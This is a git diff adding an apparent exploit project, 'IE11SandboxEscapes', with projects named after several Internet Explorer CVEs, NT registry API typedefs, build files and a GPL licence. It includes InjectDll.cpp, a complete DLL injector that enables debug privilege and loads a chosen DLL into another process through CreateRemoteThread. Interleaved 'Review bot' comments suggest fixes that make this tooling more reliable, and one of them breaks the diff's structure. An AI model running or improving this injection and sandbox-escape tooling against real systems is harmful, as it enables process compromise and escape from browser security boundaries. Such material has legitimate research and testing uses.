+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ DWORD Length;
+ HANDLE RootDirectory;
+ PUNICODE_STRING ObjectName;
+ DWORD Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+
+typedef DWORD (__stdcall *fNtCreateKey)(
+ HANDLE KeyHandle,
+ DWORD DesiredAccess,
+ POBJECT_ATTRIBUTES ObjectAttributes,
+ DWORD TitleIndex,
+ PUNICODE_STRING Class,
+ DWORD CreateOptions,
+ PDWORD Disposition
+);
+
+typedef DWORD (__stdcall *fNtSetValueKey)(
+ HANDLE KeyHandle,
+ PUNICODE_STRING ValueName,
+ DWORD TitleIndex,
+ DWORD Type,
+ const void* Data,
+ DWORD DataSize
+);
+
+typedef DWORD (__stdcall *fNtDeleteKey)(
+ HANDLE KeyHandle
+);
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp
new file mode 100755
index 0000000000..51ec5e2107
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CommandUtils.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h
new file mode 100755
index 0000000000..c846c60793
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <tchar.h>
+#include <Windows.h>
+#include <strsafe.h>
+#include <vector>
+#include <string>
+#include <sstream>
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
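Review bot: The `fNtCreateKey` typedef in regln.h declares its first parameter as `HANDLE KeyHandle`, but regln.cpp passes `&hdl_nt_keyhandle` and then uses the handle that comes back, so the parameter is really an out-pointer and the call compiles only because `HANDLE` is `void *`. Declaring it as `PHANDLE KeyHandle` makes the prototype match its use and lets the compiler catch a caller that passes a handle by value. The header also has no include guard, while the other headers added in this commit use `#pragma once`; the same line at the top of regln.h would keep the struct definitions from being redefined on a second include.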
diff --git a/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln b/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln
new file mode 100755
index 0000000000..f5cf04e173
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln
@@ -0,0 +1,72 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.30501.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDll", "InjectDll\InjectDll.vcxproj", "{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5045", "CVE-2013-5045\CVE-2013-5045.vcxproj", "{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5046", "CVE-2013-5046\CVE-2013-5046.vcxproj", "{7A9AC14A-00BC-4A69-9B86-C80635606FEA}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0268", "CVE-2014-0268\CVE-2014-0268.vcxproj", "{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0257", "CVE-2014-0257\CVE-2014-0257.vcxproj", "{2A46841E-E3FC-42FF-BCDF-70F76E757E26}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|Win32.ActiveCfg = Debug|Win32 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.ActiveCfg = Debug|x64 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.Build.0 = Debug|x64 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|Win32.ActiveCfg = Release|Win32 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.ActiveCfg = Release|x64 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.Build.0 = Release|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.ActiveCfg = Debug|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.Build.0 = 
Debug|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.ActiveCfg = Debug|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.Build.0 = Debug|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.ActiveCfg = Release|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.Build.0 = Release|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.ActiveCfg = Release|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.Build.0 = Release|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.ActiveCfg = Debug|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.Build.0 = Debug|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.ActiveCfg = Debug|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.Build.0 = Debug|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.ActiveCfg = Release|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.Build.0 = Release|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.ActiveCfg = Release|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.Build.0 = Release|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|Win32.ActiveCfg = Debug|Win32 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.ActiveCfg = Debug|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.Build.0 = Debug|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|Win32.ActiveCfg = Release|Win32 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.ActiveCfg = Release|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.Build.0 = Release|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|Win32.ActiveCfg = Debug|Win32 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.ActiveCfg = Debug|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.Build.0 = Debug|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|Win32.ActiveCfg = Release|Win32 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.ActiveCfg = Release|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.Build.0 = Release|x64 + 
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.ActiveCfg = Debug|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.Build.0 = Debug|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.ActiveCfg = Debug|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.Build.0 = Debug|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.ActiveCfg = Release|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.Build.0 = Release|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.ActiveCfg = Release|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp new file mode 100755 index 0000000000..4dfba1f89c --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp 
@@ -0,0 +1,107 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
+{
+ TOKEN_PRIVILEGES tp;
+ LUID luid;
+
+ if(!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
+ {
+ printf("Error 1 %d\n", GetLastError());
+ return FALSE;
+ }
+
+ tp.PrivilegeCount = 1;
+ tp.Privileges[0].Luid = luid;
+ if(bEnablePrivilege)
+ {
+ tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+ }
+ else
+ {
+ tp.Privileges[0].Attributes = 0;
+ }
+
+ if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
+ {
+ printf("Error adjusting privilege %d\n", GetLastError());
+ return FALSE;
+ }
+
+ if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
+ {
+ printf("Not all privilges available\n");
+ return FALSE;
+ }
+
+ return TRUE;
+}
+
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+ if(argc < 3)
+ {
+ printf("Usage: InjectDll pid PathToDll\n");
+ return 1;
+ }
+
+ WCHAR path[MAX_PATH];
+
+ GetFullPathName(argv[2], MAX_PATH, path, nullptr);
+ int pid = wcstoul(argv[1], 0, 0);
+
+ printf("Injecting DLL: %ls into PID: %d\n", path, pid);
+
+ HANDLE hToken;
+ OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
+
+ SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
+
+ HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid);
+ if(hProcess)
+ {
+ size_t strSize = (wcslen(path) + 1) * sizeof(WCHAR);
+ LPVOID pBuf = VirtualAllocEx(hProcess, 0, strSize, MEM_COMMIT, PAGE_READWRITE);
+ if(pBuf == NULL)
+ {
+ printf("Couldn't allocate memory in process\n");
+ return 1;
+ }
+ SIZE_T written;
+ if (!WriteProcessMemory(hProcess, pBuf, path, strSize, &written))
+ {
+ printf("Couldn't write to process memory\n");
+ return 1;
+ }
+
+ LPVOID pLoadLibraryW = GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW");
+
+ if(!CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryW, pBuf, 0, NULL))
+ {
+ printf("Couldn't create remote thread %d\n", GetLastError());
+ }
+ }
+ else
+ {
+ printf("Couldn't open process %d\n", GetLastError());
+ }
+
+ return 0;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
new file mode 100755
index 0000000000..73d3147876
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
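Review bot: In `_tmain`, `hToken` is declared uninitialised and the result of `OpenProcessToken` is not checked, so a failed call hands an indeterminate handle to `SetPrivilege`, whose own return value is then discarded as well. Both should be guarded, starting with `if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return 1;`. The `OpenProcess` and `CreateRemoteThread` failure branches print an error but fall through to `return 0;`, so a caller cannot tell failure from success by exit status, and none of the handles opened in this function is closed. `GetLastError()` returns a `DWORD`, so the `%d` conversions here and in `SetPrivilege` should be `%lu`.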
@@ -0,0 +1,155 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>InjectDll</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + 
</PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="InjectDll.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp new file mode 100755 index 0000000000..85ffe01166 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp 
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// InjectDll.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h
new file mode 100755
index 0000000000..83ad88a10f
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h
@@ -0,0 +1,12 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <stdio.h>
+#include <tchar.h>
+#include <Windows.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h b/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/LICENSE b/external/source/exploits/IE11SandboxEscapes/LICENSE
new file mode 100755
index 0000000000..70566f2d0e
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/LICENSE
@@ -0,0 +1,674 @@ +GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. 
+ + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. 
+ + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. 
+ + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. 
Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. 
